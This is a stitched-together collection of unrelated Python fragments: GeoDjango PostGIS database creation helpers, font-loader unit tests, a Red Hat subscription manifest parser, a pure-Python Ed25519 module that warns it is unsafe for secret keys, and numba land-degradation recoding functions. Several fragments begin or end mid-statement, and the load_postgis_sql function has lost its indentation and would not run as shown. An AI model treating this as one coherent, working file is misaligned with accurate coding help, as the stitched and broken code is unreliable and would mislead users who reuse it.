        else:
            raise Exception('Unknown error occurred in creating database: %s' % output)
def create_spatial_db(test=False, verbosity=1, autoclobber=False, interactive=False):
    """
    Creates a spatial database based on the settings.

    test        -- create the test database (via cursor) instead of the real
                   one (via shell createdb)
    autoclobber -- drop an existing database without prompting
    interactive -- passed through to the final 'syncdb' management command

    Side effects: rebinds settings.DATABASE_NAME to the created database and
    closes the current connection before syncdb.
    """
    # Making sure we're using PostgreSQL and psycopg2
    if settings.DATABASE_ENGINE != 'postgresql_psycopg2':
        raise Exception('Spatial database creation only supported postgresql_psycopg2 platform.')
    # Getting the spatial database name
    if test:
        db_name = get_spatial_db(test=True)
        _create_with_cursor(db_name, verbosity=verbosity, autoclobber=autoclobber)
    else:
        db_name = get_spatial_db()
        _create_with_shell(db_name, verbosity=verbosity, autoclobber=autoclobber)
    # Creating the db language, does not need to be done on NT platforms
    # since the PostGIS installer enables this capability.
    if os.name != 'nt':
        create_lang(db_name, verbosity=verbosity)
    # Now adding in the PostGIS routines.
    load_postgis_sql(db_name, verbosity=verbosity)
    if verbosity >= 1: print 'Creation of spatial database %s successful.' % db_name
    # Closing the connection
    connection.close()
    settings.DATABASE_NAME = db_name
    # Syncing the database
    call_command('syncdb', verbosity=verbosity, interactive=interactive)
def drop_db(db_name=False, test=False):
    """
    Drops the given database. When no name is given, the name returned by
    get_spatial_db() (honoring the `test` flag) is used. All exceptions are
    propagated up to the caller.
    """
    target = db_name if db_name else get_spatial_db(test=test)
    cursor = connection.cursor()
    drop_sql = 'DROP DATABASE %s' % connection.ops.quote_name(target)
    cursor.execute(drop_sql)
def get_cmd_options(db_name):
    "Obtains the command-line PostgreSQL connection options for shell commands."
    # Each configured setting contributes a "-flag value " fragment; note the
    # trailing space on every fragment, which callers rely on when building
    # the full shell command. db_name is optional (may be falsy).
    fragments = []
    if db_name:
        fragments.append('-d %s ' % db_name)
    if settings.DATABASE_USER:
        fragments.append('-U %s ' % settings.DATABASE_USER)
    if settings.DATABASE_HOST:
        fragments.append('-h %s ' % settings.DATABASE_HOST)
    if settings.DATABASE_PORT:
        fragments.append('-p %s ' % settings.DATABASE_PORT)
    return ''.join(fragments)
def get_spatial_db(test=False):
    """
    Returns the name of the spatial database. The 'test' keyword may be set
    to return the test spatial database name.
    """
    if not test:
        # production name must be explicitly configured
        if not settings.DATABASE_NAME:
            raise Exception('must configure DATABASE_NAME in settings.py')
        return settings.DATABASE_NAME
    # test database: honor an explicit TEST_DATABASE_NAME, otherwise derive
    # it by prefixing the configured database name
    if settings.TEST_DATABASE_NAME:
        return settings.TEST_DATABASE_NAME
    return TEST_DATABASE_PREFIX + settings.DATABASE_NAME
def load_postgis_sql(db_name, verbosity=1):
"""
This routine loads up the PostGIS SQL files lwpostgis.sql and
spatial_ref_sys.sql.
"""
# Getting the path to the PostGIS SQL
try:
# POSTGIS_SQL_PATH may be placed in settings to tell GeoDjango where the
# PostGIS SQL files are located. This is especially useful on Win32
# platforms since the output of pg_config looks like "C:/PROGRA~1/..".
sql_path = settings.POSTGIS_SQL_PATH
except AttributeError:
status, sql_path = getstatusoutput('pg_config --sharedir')
if status:
sql_path = '/usr/local/share'
# The PostGIS SQL post-creation files.
lwpostgis_file = os.path.join(sql_path, 'lwpostgis.sql')
srefsys_file = os.path.join(sql_path, 'spatial_ref_sys.sql')
if not os.path.isfile(lwpostgis_file):
raise Exception('Could not find PostGIS function definitions in %s' % lwpostgis_file)
if not os.path.isfile(srefsys_file):
raise Exception('Could not find PostGIS spatial reference system definitions in %s' % srefsys_file)
# Getting the psql command-line options, and command format.
options = get_cmd_options(db_name)
cmd_fmt = 'psql %s-f "%%s"' % options
# Now trying to load up the PostGIS functions
cmd = cmd_fmt % lwpostgis_file
if verbosity >= 1: print cmd
status, output = getstatusoutput(cmd)
if status:
raise Exception('Error in loading PostGIS lwgeometry routines.')
# Now trying to load up the Spatial Reference System table
cmd = cmd_fmt % srefsys_file
if verbosity >= 1: print cmd
status, output = getstatusoutput(cmd)
if status:
raise Exception('Error in loading PostGIS spatial_ref_sys table.')
# Setting the permissions because on Windows platforms the owner
# of the spatial_ref_sys and geometry_columns tables is always
# the postgres user, regardless of how the db is created.
if os.name == 'nt': set_permissions(db_na |
import logging
import unittest
from functools import reduce
from ass_parser import StyleInfo, UsageData
from font_loader import TTFFont, FontInfo, FontLoader, TTCFont, FontWeight
from tests.common import get_file_in_test_directory
class FontLoaderTests(unittest.TestCase):
    """Tests for FontLoader's matching of requested styles to discovered fonts."""

    def test_returns_all_not_found_fonts(self):
        loader = FontLoader(None, True)
        requested = {
            StyleInfo('Jorvik', 0, False): UsageData(),
            StyleInfo('Random font', 0, False): UsageData(),
        }
        found, not_found = loader.get_fonts_for_list(requested)
        self.assertEqual(2, len(not_found))

    def test_returns_all_found_fonts(self):
        loader = FontLoader([get_file_in_test_directory('')], True)
        requested = {
            StyleInfo('Jorvik Informal V2', 0, False): UsageData(),
            StyleInfo('Random font', 0, False): UsageData(),
        }
        found, not_found = loader.get_fonts_for_list(requested)
        self.assertEqual(1, len(found))
        self.assertIn('Jorvik Informal V2', list(found.values())[0].names)

    def test_performs_case_insensitive_search(self):
        loader = FontLoader([get_file_in_test_directory('')], True)
        requested = {StyleInfo('JoRvIk INFormAl v2', 0, False): UsageData()}
        found, not_found = loader.get_fonts_for_list(requested)
        self.assertEqual(1, len(found))

    def test_does_not_add_same_font_twice(self):
        # The same directory is supplied twice; its fonts must be deduplicated.
        loader = FontLoader([get_file_in_test_directory(''), get_file_in_test_directory('')], True)
        requested = {
            StyleInfo('Jorvik', 0, False): UsageData(),
            StyleInfo('Jorvik informal', 0, False): UsageData(),
        }
        found, not_found = loader.get_fonts_for_list(requested)
        self.assertEqual(1, len(found))

    def test_loads_at_least_some_system_fonts(self):
        loader = FontLoader(None, True)
        self.assertTrue(len(loader.fonts) > 0)

    def test_finds_all_required_fonts(self):
        loader = FontLoader(None, True)
        loader.fonts.append(FontInfo(['Arial'], False, False, FontWeight.FW_NORMAL, 'random', '1'))
        loader.fonts.append(FontInfo(['Arial Black'], False, False, FontWeight.FW_NORMAL, 'random', '2'))
        requested = {
            StyleInfo('Arial', 0, False): UsageData(),
            StyleInfo('Arial Black', 0, False): UsageData(),
        }
        found, not_found = loader.get_fonts_for_list(requested)
        self.assertEqual(2, len(found))

    def test_returns_only_appropriate_font(self):
        # 'Arial' must not also match the distinct family 'Arial Black'.
        loader = FontLoader(None, True)
        loader.fonts.append(FontInfo(['Arial'], False, False, FontWeight.FW_NORMAL, 'random', '1'))
        loader.fonts.append(FontInfo(['Arial Black'], False, False, FontWeight.FW_NORMAL, 'random', '2'))
        requested = {StyleInfo('Arial', 0, False): UsageData()}
        found, not_found = loader.get_fonts_for_list(requested)
        self.assertEqual(1, len(found))
class TTFFontTests(unittest.TestCase):
    """Tests for name/style/weight extraction from individual TTF/OTF files."""

    @staticmethod
    def _load(file_name):
        # Convenience wrapper: open a font shipped with the test data.
        return TTFFont(get_file_in_test_directory(file_name))

    def test_ttf_name_matches(self):
        self.assertIn('Seriously', self._load('seriously.ttf').get_info().names)

    def test_otf_name_matches(self):
        self.assertIn('otfpoc', self._load('otfpoc.otf').get_info().names)

    def test_jorvik_v2_name_matches(self):
        self.assertIn('Jorvik Informal V2', self._load('Jorvik.ttf').get_info().names)

    def test_detects_italic_only_font(self):
        font = self._load('CaviarDreams_Italic.ttf')
        self.assertIs(font.get_info().italic, True)

    def test_detects_bold_only_font(self):
        font = self._load('Caviar Dreams Bold.ttf')
        self.assertIs(font.get_info().bold, True)

    def test_detects_italic_bold_font(self):
        font = self._load('CaviarDreams_BoldItalic.ttf')
        self.assertIs(font.get_info().italic, True)
        self.assertIs(font.get_info().bold, True)

    def test_parses_fonts_with_platform_id_2_strings(self):
        self.assertIn('Vanta Thin', self._load('VANTATHI.TTF').get_info().names)

    def test_parses_fonts_with_utf8_platform_id_0_strings(self):
        self.assertIn('Susanna', self._load('SUSANNA_.otf').get_info().names)

    def test_detects_bold_weight(self):
        font = self._load('Caviar Dreams Bold.ttf')
        self.assertEqual(font.get_info().weight, FontWeight.FW_BOLD)

    def test_detects_regular_weight(self):
        font = self._load('Jorvik.ttf')
        self.assertEqual(font.get_info().weight, FontWeight.FW_NORMAL)

    def test_detects_medium_weight(self):
        font = self._load('seriously.ttf')
        self.assertEqual(font.get_info().weight, FontWeight.FW_MEDIUM)
class TTCFontTests(unittest.TestCase):
    """Tests for TrueType collection (.ttc) files bundling several fonts."""

    def test_contains_all_names(self):
        font = TTCFont(get_file_in_test_directory('jorvik_and_seriously.ttc'))
        # Flatten the names of every contained font before checking membership.
        self.assertIn('Seriously',
                      [name for info in font.get_infos() for name in info.names])
        self.assertIn('Jorvik Informal V2',
                      [name for info in font.get_infos() for name in info.names])
class FontInfoTests(unittest.TestCase):
    """Tests for the lazily computed, cached MD5 checksum on FontInfo."""

    @staticmethod
    def _make_info():
        # FontInfo backed by a real font file so its MD5 can be computed.
        return FontInfo([], False, False, 0, get_file_in_test_directory('Jorvik.ttf'), None)

    def test_calculates_md5_on_access(self):
        self.assertIsNotNone(self._make_info().md5)

    def test_calculates_correct_md5(self):
        self.assertEqual(self._make_info().md5, '0dae05c47e919281d7ac1e0170e4d3a8')

    def test_caches_md5_in_private_field(self):
        info = self._make_info()
        self.assertIsNone(info._FontInfo__md5)
        info.md5  # first access should populate the private cache field
        self.assertIsNotNone(info._FontInfo__md5)
|
see
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
#
# Red Hat trademarks are not licensed under GPLv2. No permission is
# granted to use or replicate Red Hat trademarks that are incorporated
# in this software or its documentation.
#
import cStringIO
import json
import zipfile
import os
from M2Crypto import X509
import constants
class Manifest(object):
    """Class containing relevant data from RHSM manifest.

    A manifest is a zip archive containing a detached signature plus an
    inner zip (consumer_export.zip) that holds the entitlements, the
    Satellite certificate and the product definitions.
    """
    # Well-known member names/paths inside the manifest archives.
    SIGNATURE_NAME = "signature"
    INNER_ZIP_NAME = "consumer_export.zip"
    ENTITLEMENTS_PATH = "export/entitlements"
    CERTIFICATE_PATH = "export/extensions"
    PRODUCTS_PATH = "export/products"
    def __init__(self, zip_path):
        """Parse the manifest zip file at ``zip_path``.

        Populates all_entitlements, sat5_certificate, signature and data.
        Propagates errors raised while extracting the certificate or the
        entitlements.
        """
        self.all_entitlements = []
        self.manifest_repos = {}
        self.sat5_certificate = None
        # Signature and signed data
        self.signature = None
        self.data = None
        # Open manifest from path
        top_zip = None
        inner_zip = None
        inner_file = None
        # Nested try/finally (instead of `with`) keeps compatibility with
        # very old Python versions -- see the 2.4 note in _load_entitlements.
        try:
            top_zip = zipfile.ZipFile(zip_path, 'r')
            # Fetch inner zip file into memory
            try:
                # inner_file = top_zip.open(zip_path.split('.zip')[0] + '/' + self.INNER_ZIP_NAME)
                inner_file = top_zip.open(self.INNER_ZIP_NAME)
                # Keep the raw bytes: check_signature() verifies the detached
                # signature against exactly this data.
                self.data = inner_file.read()
                inner_file_data = cStringIO.StringIO(self.data)
                signature_file = top_zip.open(self.SIGNATURE_NAME)
                self.signature = signature_file.read()
                # Open the inner zip file
                try:
                    inner_zip = zipfile.ZipFile(inner_file_data)
                    self._load_entitlements(inner_zip)
                    self._extract_certificate(inner_zip)
                finally:
                    if inner_zip is not None:
                        inner_zip.close()
            finally:
                if inner_file is not None:
                    inner_file.close()
        finally:
            if top_zip is not None:
                top_zip.close()
    def _extract_certificate(self, zip_file):
        """Store the first ``*.xml`` certificate found under CERTIFICATE_PATH.

        Raises MissingSatelliteCertificateError when none is present.
        """
        files = zip_file.namelist()
        certificates_names = []
        for f in files:
            if f.startswith(self.CERTIFICATE_PATH) and f.endswith(".xml"):
                certificates_names.append(f)
        if len(certificates_names) >= 1:
            # take only first file
            cert_file = zip_file.open(certificates_names[0]) # take only first file
            self.sat5_certificate = cert_file.read().strip()
            cert_file.close()
        else:
            raise MissingSatelliteCertificateError("Satellite Certificate was not found in manifest.")
    def _fill_product_repositories(self, zip_file, product):
        """Read ``<product id>.json`` from PRODUCTS_PATH and register each
        content repository (label -> contentUrl) on ``product``."""
        product_file = zip_file.open(self.PRODUCTS_PATH + '/' + str(product.get_id()) + '.json')
        product_data = json.load(product_file)
        product_file.close()
        try:
            for content in product_data['productContent']:
                content = content['content']
                product.add_repository(content['label'], content['contentUrl'])
        except KeyError:
            print("ERROR: Cannot access required field in product '%s'" % product.get_id())
            raise
    def _load_entitlements(self, zip_file):
        """Build self.all_entitlements from every JSON file under
        ENTITLEMENTS_PATH.

        Raises IncorrectEntitlementsFileFormatError when no entitlement
        file exists or a file does not contain exactly one certificate.
        """
        files = zip_file.namelist()
        entitlements_files = []
        for f in files:
            if f.startswith(self.ENTITLEMENTS_PATH) and f.endswith(".json"):
                entitlements_files.append(f)
        if len(entitlements_files) >= 1:
            self.all_entitlements = []
            for entitlement_file in entitlements_files:
                entitlements = zip_file.open(entitlement_file)
                # try block in try block - this is hack for python 2.4 compatibility
                # to support finally
                try:
                    try:
                        data = json.load(entitlements)
                        # Extract credentials
                        certs = data['certificates']
                        if len(certs) != 1:
                            raise IncorrectEntitlementsFileFormatError(
                                "ERROR: Single certificate in entitlements file is expected, found: %d"
                                % len(certs))
                        cert = certs[0]
                        credentials = Credentials(data['id'], cert['cert'], cert['key'])
                        # Extract product IDs
                        products = []
                        provided_products = data['pool']['providedProducts']
                        for provided_product in provided_products:
                            product = Product(provided_product['productId'])
                            self._fill_product_repositories(zip_file, product)
                            products.append(product)
                        # Skip entitlements not providing any products
                        if products:
                            entitlement = Entitlement(products, credentials)
                            self.all_entitlements.append(entitlement)
                    except KeyError:
                        print("ERROR: Cannot access required field in file '%s'" % entitlement_file)
                        raise
                finally:
                    entitlements.close()
        else:
            raise IncorrectEntitlementsFileFormatError(
                "ERROR: There has to be at least one entitlements file")
    def get_all_entitlements(self):
        """Return the list of Entitlement objects parsed from the manifest."""
        return self.all_entitlements
    def get_satellite_certificate(self):
        """Return the raw Satellite certificate text extracted at parse time."""
        return self.sat5_certificate
    def check_signature(self):
        """Verify the detached SHA-256 signature of the inner zip data.

        Tries every certificate in constants.CANDLEPIN_CA_CERT_DIR and
        returns True as soon as one verifies the signature, else False.
        """
        if self.signature and self.data:
            certs = os.listdir(constants.CANDLEPIN_CA_CERT_DIR)
            # At least one certificate has to match
            for cert_name in certs:
                cert_file = None
                try:
                    cert_file = open(constants.CANDLEPIN_CA_CERT_DIR + '/' + cert_name, 'r')
                    cert = X509.load_cert_string(cert_file.read())
                except (IOError, X509.X509Error):
                    # Unreadable or invalid certificate: try the next one.
                    continue
                finally:
                    if cert_file is not None:
                        cert_file.close()
                pubkey = cert.get_pubkey()
                pubkey.reset_context(md='sha256')
                pubkey.verify_init()
                pubkey.verify_update(self.data)
                if pubkey.verify_final(self.signature):
                    return True
        return False
class Entitlement(object):
    """A set of products together with the credentials granting access to them."""

    def __init__(self, products, credentials):
        # Guard clause: both parts are mandatory.
        if not products or not credentials:
            raise IncorrectEntitlementError()
        self.products = products
        self.credentials = credentials

    def get_products(self):
        """Return the products provided by this entitlement."""
        return self.products

    def get_credentials(self):
        """Return the credentials associated with this entitlement."""
        return self.credentials
class Credentials(object):
    """Client certificate/key pair identified by an entitlement ID."""

    def __init__(self, identifier, cert, key):
        # Guard clauses: the ID is checked first, then the cert/key pair.
        if not identifier:
            raise IncorrectCredentialsError(
                "ERROR: ID of credentials has to be defined"
            )
        if not cert or not key:
            raise IncorrectCredentialsError(
                "ERROR: Trying to create object with cert = %s and key = %s"
                % (cert, key)
            )
        self.id = identifier
        self.cert = cert
        self.key = key

    def get_id(self):
        """Return the entitlement identifier."""
        return self.id

    def get_cert(self):
        """Return the client certificate."""
        return self.cert

    def get_key(self):
        """Return the client key."""
        return self.key
class Product(object):
    """A product identified by an integer ID, with its content repositories."""

    def __init__(self, identifier):
        try:
            self.id = int(identifier)
        except ValueError:
            raise IncorrectProductError(
                "ERROR: Invalid product id: %s" % identifier
            )
        # Maps repository label -> repository URL.
        self.repositories = {}

    def get_id(self):
        """Return the numeric product ID."""
        return self.id

    def get_repositories(self):
        """Return the mapping of repository label to URL."""
        return self.repositories

    def add_repository(self, label, url):
        """Register (or overwrite) the repository ``label`` with ``url``."""
        self.repositories[label] = url
class IncorrectProductError(Exception):
    """Raised when a product identifier is not a valid integer."""
class IncorrectEntitlementError(Exception):
|
# ed25519.py - Optimized version of the reference implementation of Ed25519
#
# Written in 2011? by Daniel J. Bernstein <djb@cr.yp.to>
# 2013 by Donald Stufft <donald@stufft.io>
# 2013 by Alex Gaynor <alex.gaynor@gmail.com>
# 2013 by Greg Price <price@mit.edu>
#
# To the extent possible under law, the author(s) have dedicated all copyright
# and related and neighboring rights to this software to the public domain
# worldwide. This software is distributed without any warranty.
#
# You should have received a copy of the CC0 Public Domain Dedication along
# with this software. If not, see
# <http://creativecommons.org/publicdomain/zero/1.0/>.
"""
NB: This code is not safe for use with secret keys or secret data.
The only safe use of this code is for verifying signatures on public messages.
Functions for computing the public key of a secret key and for signing
a message are included, namely publickey_unsafe and signature_unsafe,
for testing purposes only.
The root of the problem is that Python's long-integer arithmetic is
not designed for use in cryptography. Specifically, it may take more
or less time to execute an operation depending on the values of the
inputs, and its memory access patterns may also depend on the inputs.
This opens it to timing and cache side-channel attacks which can
disclose data to an attacker. We rely on Python's long-integer
arithmetic, so we cannot handle secrets without risking their disclosure.
"""
import hashlib
import operator
import sys
__version__ = "1.0.dev0"
# Useful for very coarse version differentiation.
PY3 = sys.version_info[0] == 3
if PY3:
    # Python 3: indexing bytes yields ints, and bytes() accepts int lists.
    indexbytes = operator.getitem
    intlist2bytes = bytes
    int2byte = operator.methodcaller("to_bytes", 1, "big")
else:
    # Python 2: bytes are str, so go through chr()/ord().
    int2byte = chr
    range = xrange
    def indexbytes(buf, i):
        # Return the byte at index i of buf as an int.
        return ord(buf[i])
    def intlist2bytes(l):
        # Convert a list of ints (0..255) to a byte string.
        return b"".join(chr(c) for c in l)
# Ed25519 parameters.
b = 256  # bit length of encoded integers/points (see encodeint/encodepoint)
q = 2 ** 255 - 19  # field prime
l = 2 ** 252 + 27742317777372353535851937790883648493  # group order: scalarmult(B, l) == ident
def H(m):
    """Return the SHA-512 digest of message ``m`` (64 bytes)."""
    hasher = hashlib.sha512(m)
    return hasher.digest()
def pow2(x, p):
    """== pow(x, 2**p, q)"""
    # Repeated squaring modulo q; for p == 0 the input is returned unreduced,
    # matching the original while-loop behaviour.
    for _ in range(p):
        x = x * x % q
    return x
def inv(z):
    """$= z^{-1} \mod q$, for z != 0"""
    # Computes z**(q-2) mod q (Fermat's little theorem) via a fixed
    # addition chain; the trailing comments track the current exponent.
    # Adapted from curve25519_athlon.c in djb's Curve25519.
    z2 = z * z % q  # 2
    z9 = pow2(z2, 2) * z % q  # 9
    z11 = z9 * z2 % q  # 11
    z2_5_0 = (z11 * z11) % q * z9 % q  # 31 == 2^5 - 2^0
    z2_10_0 = pow2(z2_5_0, 5) * z2_5_0 % q  # 2^10 - 2^0
    z2_20_0 = pow2(z2_10_0, 10) * z2_10_0 % q  # ...
    z2_40_0 = pow2(z2_20_0, 20) * z2_20_0 % q
    z2_50_0 = pow2(z2_40_0, 10) * z2_10_0 % q
    z2_100_0 = pow2(z2_50_0, 50) * z2_50_0 % q
    z2_200_0 = pow2(z2_100_0, 100) * z2_100_0 % q
    z2_250_0 = pow2(z2_200_0, 50) * z2_50_0 % q  # 2^250 - 2^0
    return pow2(z2_250_0, 5) * z11 % q  # 2^255 - 2^5 + 11 = q - 2
# Twisted Edwards curve constant d = -121665/121666 (mod q).
d = -121665 * inv(121666) % q
# I = 2**((q-1)/4), a square root of -1 mod q; used by xrecover when the
# first candidate root fails.
I = pow(2, (q - 1) // 4, q)
def xrecover(y):
    """Recover the even x-coordinate matching y on the curve."""
    # Candidate x^2 from the curve equation, then a (q+3)/8 exponent root.
    x_squared = (y * y - 1) * inv(d * y * y + 1)
    root = pow(x_squared, (q + 3) // 8, q)
    # If the candidate does not square back to x^2, multiply by sqrt(-1).
    if (root * root - x_squared) % q != 0:
        root = (root * I) % q
    # Normalise to the even root.
    if root % 2 != 0:
        root = q - root
    return root
# Standard Ed25519 base point: y = 4/5, x recovered with even parity.
By = 4 * inv(5)
Bx = xrecover(By)
# Extended coordinates (x, y, z, t) with z = 1 and t = x*y.
B = (Bx % q, By % q, 1, (Bx * By) % q)
# Neutral element of the group in extended coordinates.
ident = (0, 1, 1, 0)
def edwards_add(P, Q):
    """Add two points given in extended twisted Edwards coordinates.

    This is formula sequence 'addition-add-2008-hwcd-3' from
    http://www.hyperelliptic.org/EFD/g1p/auto-twisted-extended-1.html
    """
    (x1, y1, z1, t1) = P
    (x2, y2, z2, t2) = Q
    A = (y1 - x1) * (y2 - x2) % q
    B = (y1 + x1) * (y2 + x2) % q
    C = t1 * 2 * d * t2 % q
    D = z1 * 2 * z2 % q
    E = B - A
    F = D - C
    G = D + C
    H = B + A
    # Result: (x3, y3, z3, t3) = (E*F, G*H, F*G, E*H), each reduced mod q.
    return (E * F % q, G * H % q, F * G % q, E * H % q)
def edwards_double(P):
    """Double a point given in extended twisted Edwards coordinates.

    This is formula sequence 'dbl-2008-hwcd' from
    http://www.hyperelliptic.org/EFD/g1p/auto-twisted-extended-1.html
    """
    (x1, y1, z1, t1) = P
    A = x1 * x1 % q
    B = y1 * y1 % q
    C = 2 * z1 * z1 % q
    E = ((x1 + y1) * (x1 + y1) - A - B) % q
    G = B - A  # i.e. D + B with D = -A
    F = G - C
    H = -A - B  # i.e. D - B
    # Result: (x3, y3, z3, t3) = (E*F, G*H, F*G, E*H), each reduced mod q.
    return (E * F % q, G * H % q, F * G % q, E * H % q)
def scalarmult(P, e):
    """Multiply point P by scalar e via recursive double-and-add."""
    if not e:
        return ident
    # Compute [e // 2]P, double it, then add P when the low bit is set.
    doubled = edwards_double(scalarmult(P, e >> 1))
    return edwards_add(doubled, P) if e & 1 else doubled
# Bpow[i] == scalarmult(B, 2**i)
Bpow = []
def make_Bpow():
    """Precompute 253 successive doublings of the base point for scalarmult_B."""
    P = B
    for i in range(253):
        Bpow.append(P)
        P = edwards_double(P)
# Populate the table once at import time.
make_Bpow()
def scalarmult_B(e):
    """
    Implements scalarmult(B, e) more efficiently, using the precomputed
    table of base-point doublings (Bpow).
    """
    # scalarmult(B, l) is the identity, so reduce the scalar first.
    e = e % l
    result = ident
    for doubling in Bpow:
        if e & 1:
            result = edwards_add(result, doubling)
        e >>= 1
    assert e == 0, e
    return result
def encodeint(y):
    """Encode integer ``y`` as b/8 little-endian bytes (bits >= b are dropped)."""
    return b''.join(
        int2byte((y >> (8 * i)) & 0xFF) for i in range(b // 8)
    )
def encodepoint(P):
    """Encode a point: b-1 little-endian bits of y, with x's parity as the top bit."""
    (x, y, z, t) = P
    # Convert from projective to affine coordinates.
    zi = inv(z)
    x = (x * zi) % q
    y = (y * zi) % q
    # Pack y's low b-1 bits plus the parity of x into one integer.
    combined = (y & ((1 << (b - 1)) - 1)) | ((x & 1) << (b - 1))
    return b''.join(
        int2byte((combined >> (8 * i)) & 0xFF) for i in range(b // 8)
    )
def bit(h, i):
    """Return bit ``i`` (little-endian within each byte) of byte string ``h``."""
    byte_index, bit_index = divmod(i, 8)
    return (indexbytes(h, byte_index) >> bit_index) & 1
def publickey_unsafe(sk):
    """
    Derive and encode the public key for secret key ``sk``.

    Not safe to use with secret keys or secret data.
    See module docstring. This function should be used for testing only.
    """
    digest = H(sk)
    # Clamped scalar: top bit 2**(b-2) set, bits 0..2 and b-2..b-1 cleared.
    scalar = (1 << (b - 2)) + sum(bit(digest, i) << i for i in range(3, b - 2))
    return encodepoint(scalarmult_B(scalar))
def Hint(m):
    """Hash ``m`` with SHA-512 and interpret the digest as a little-endian integer."""
    digest = H(m)
    return sum(bit(digest, i) << i for i in range(2 * b))
def signature_unsafe(m, sk, pk):
    """
    Sign message ``m`` with secret key ``sk`` and encoded public key ``pk``.

    Not safe to use with secret keys or secret data.
    See module docstring. This function should be used for testing only.
    """
    digest = H(sk)
    # Clamped secret scalar, as in publickey_unsafe.
    scalar = (1 << (b - 2)) + sum(bit(digest, i) << i for i in range(3, b - 2))
    # Deterministic nonce from the second half of the digest and the message.
    prefix = intlist2bytes([indexbytes(digest, j) for j in range(b // 8, b // 4)])
    nonce = Hint(prefix + m)
    R = scalarmult_B(nonce)
    S = (nonce + Hint(encodepoint(R) + pk + m) * scalar) % l
    return encodepoint(R) + encodeint(S)
def isoncurve(P):
    """Check that P (extended coordinates) satisfies the curve equation."""
    (x, y, z, t) = P
    if z % q == 0:
        return False
    # Extended-coordinate consistency: t == x*y/z.
    if x * y % q != z * t % q:
        return False
    # Projective curve equation: -x^2 + y^2 = z^2 + d*t^2.
    return (y * y - x * x - z * z - d * t * t) % q == 0
def decodeint(s):
    """Decode b little-endian bits of ``s`` into a non-negative integer."""
    return sum(bit(s, i) << i for i in range(b))
def decodepoint(s):
    """Decode an encoded point, raising ValueError if it is not on the curve."""
    # Low b-1 bits hold y; the top bit holds the parity of x.
    y = sum(bit(s, i) << i for i in range(b - 1))
    x = xrecover(y)
    if x & 1 != bit(s, b - 1):
        x = q - x
    point = (x, y, 1, (x * y) % q)
    if not isoncurve(point):
        raise ValueError("decoding point that is not on curve")
    return point
class SignatureMismatch(Exception):
    """Raised by checkvalid when a signature fails verification."""
def checkvalid(s, m, pk):
    """
    Not safe to use when any argument is secret.
    See module docstring. This function should be used only for
    verifying public signatures of public messages.

    Raises ValueError on malformed inputs and SignatureMismatch when the
    signature does not verify; returns None on success.
    """
    if len(s) != b // 4:
        raise ValueError("signature length is wrong")
    if len(pk) != b // 8:
        raise ValueError("public-key length is wrong")
    # Signature layout: encoded point R (b/8 bytes) then scalar S (b/8 bytes).
    R = decodepoint(s[:b // 8])
    A = decodepoint(pk)
    S = decodeint(s[b // 8:b // 4])
    h = Hint(encodepoint(R) + pk + m)
    # Verify the group equation [S]B == R + [h]A. The comparison is done on
    # projective coordinates via cross-multiplication, avoiding an inversion.
    (x1, y1, z1, t1) = P = scalarmult_B(S)
    (x2, y2, z2, t2) = Q = edwards_add(R, scalarmult(A, h))
    if (not isoncurve(P) or not isoncurve(Q) or
        (x1*z2 - x2*z1) % q != 0 or (y1*z2 - y2*z1) % q != 0):
        raise SignatureMismatch("signature does not pass verification")
|
import os
import json
import numpy as np
try:
    # With numba present, cc.export registers functions for ahead-of-time
    # compilation into the 'calculate_numba' extension module.
    from numba.pycc import CC
    cc = CC('calculate_numba')
except ImportError:
    # Will use these as regular Python functions if numba is not present.
    class CCSubstitute(object):
        # Make a cc.export that doesn't do anything
        # (the bound-call 'self' is absorbed by *args)
        def export(*args, **kwargs):
            def wrapper(func):
                return func
            return wrapper
    cc = CCSubstitute()
@cc.export('ldn_recode_traj', 'i2[:,:](i2[:,:])')
def ldn_recode_traj(x):
    # Recode trajectory into deg (-1), stable (0), imp (1), keeping only
    # trends that are at least 95% significant.
    #
    # Input coding:
    #   -3: 99% signif decline    3: 99% signif increase
    #   -2: 95% signif decline    2: 95% signif increase
    #   -1: 90% signif decline    1: 90% signif increase
    #    0: stable
    # NOTE: writes through the ravel()ed view, so for contiguous input the
    # caller's array is recoded in place -- confirm callers expect this.
    original_shape = x.shape
    flat = x.ravel()
    # |value| <= 1 is not significant at 95% -> stable
    flat[(flat >= -1) & (flat <= 1)] = 0
    # -3..-2 -> degradation
    flat[(flat >= -3) & (flat < -1)] = -1
    # 2..3 -> improvement
    flat[(flat > 1) & (flat <= 3)] = 1
    return np.reshape(flat, original_shape)
@cc.export('ldn_recode_state', 'i2[:,:](i2[:,:])')
def ldn_recode_state(x):
    # Recode state into deg (-1), stable (0), imp (1). More than two class
    # changes counts as degradation; the >= -10 bound keeps the no-data
    # flag from being coded as degradation.
    original_shape = x.shape
    flat = x.ravel()
    flat[(flat > -2) & (flat < 2)] = 0
    flat[(flat >= -10) & (flat <= -2)] = -1
    flat[flat >= 2] = 1
    return np.reshape(flat, original_shape)
@cc.export('ldn_make_prod5', 'i2[:,:](i2[:,:], i2[:,:], i2[:,:] ,i2[:,:])')
def ldn_make_prod5(traj, state, perf, mask):
    # Combine trajectory, state and performance into the 5-class land
    # productivity indicator. Later assignments overwrite earlier ones,
    # so the order of the masked writes below is significant.
    #
    # Coding of LPD (prod5)
    # 1: declining
    # 2: early signs of decline
    # 3: stable but stressed
    # 4: stable
    # 5: improving
    # -32768: no data
    # Declining = 1
    shp = traj.shape
    traj = traj.ravel()
    state = state.ravel()
    perf = perf.ravel()
    mask = mask.ravel()
    x = traj.copy()
    x[traj == -1] = 1
    # Stable = 4
    x[traj == 0] = 4
    # Improving = 5
    x[traj == 1] = 5
    # Stable due to agreement in perf and state but positive trajectory
    x[(traj == 1) & (state == -1) & (perf == -1)] = 4
    # Stable but stressed
    x[(traj == 0) & (state == 0) & (perf == -1)] = 3
    # Early signs of decline
    x[(traj == 0) & (state == -1) & (perf == 0)] = 2
    # Ensure NAs carry over to productivity indicator layer
    x[(traj == -32768) | (perf == -32768) | (state == -32768)] = -32768
    # Ensure masked areas carry over to productivity indicator
    x[mask == -32767] = -32767
    return(np.reshape(x, shp))
@cc.export('ldn_total_by_trans', '(f4[:,:], i2[:,:], f4[:,:])')
def ldn_total_by_trans(d, trans_a, cell_areas):
    """Calculates a total table for an array"""
    # Returns (trans, totals): the unique transition codes in trans_a and,
    # for each code, the area-weighted sum of d over cells with that code.
    d = d.ravel()
    trans_a = trans_a.ravel()
    trans = np.unique(trans_a)
    cell_areas = cell_areas.ravel()
    # Values less than zero are missing data flags
    # NOTE(review): this writes through the ravel()ed view, so for
    # contiguous input the caller's array is zeroed in place -- confirm.
